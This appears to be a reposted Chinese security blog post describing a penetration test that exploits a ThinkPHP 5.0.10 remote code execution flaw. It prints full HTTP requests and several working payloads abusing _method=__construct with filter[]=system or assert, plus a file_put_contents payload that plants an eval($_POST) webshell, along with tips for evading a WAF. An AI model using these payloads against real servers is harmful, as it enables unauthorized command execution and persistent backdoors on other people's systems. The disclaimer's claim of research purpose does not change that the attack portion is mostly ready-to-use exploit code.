文章总结： 文档记录了一次针对ThinkPHP5.0.10的RCE漏洞渗透测试过程。攻击者通过xray扫描发现漏洞，尝试多种POC利用均被WAF拦截，最终通过构造fileputcontents写入Webshell（哥斯拉马）成功获取权限。关键发现包括：使用_method=__construct&filter[]=assert组合可绕过部分防护，且不同Payload需多次尝试。建议渗透时结合多版本POC并优先尝试文件写入方式突破防御。 综合评分： 82 文章分类： 渗透测试,WEB安全,漏洞分析,实战经验,红队

攻防渗透 | 难得的thinkphp5 rce记录

安全艺术 安全艺术

安全艺术

2026年5月20日 21:00 北京

在小说阅读器读本章

去阅读

开局xray扫出thinkphp rce漏洞：

复制request放到burp进行利用：

POST / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 59Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
_method=__construct&method=GET&filter[]=system&get[]=whoami

返回版本5.0.10，那就把5.0.10的poc全打一遍

s=whoami&_method=__construct&method=POST&filter[]=system

aaaa=whoami&_method=__construct&method=GET&filter[]=system

_method=__construct&method=GET&filter[]=system&get[]=whoami

都失败了，尝试了三次后，发现目标无法访问了，应该是被waf拦截了，当时搁置了几天，后来听同事说也发现了这个漏洞但是无法利用，后续就开始查阅资料，尝试进行利用，看到有些文章里有提到写webshell，赶紧尝试下：

s=file_put_contents(‘sectest.php’,'<?php phpinfo();’)&_method=__construct&method=POST&filter[]=assert

成功写入phpinfo：

开始直接写的冰蝎马，发现连不上，再尝试写哥斯拉马，成功连上了：

POST / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0Content-Length: 127Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip
s=file_put_contents('sectest20230220.php','<?phpeval($_POST["pass2023"]);')&_method=__construct&method=POST&filter[]=assert

直接连接：

在测试的过程中要多翻翻资料，利用方法也要都尝试一下，也许就柳暗花明了呢。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术 安全艺术 安全艺术《攻防渗透 | 难得的thinkphp5 rce记录》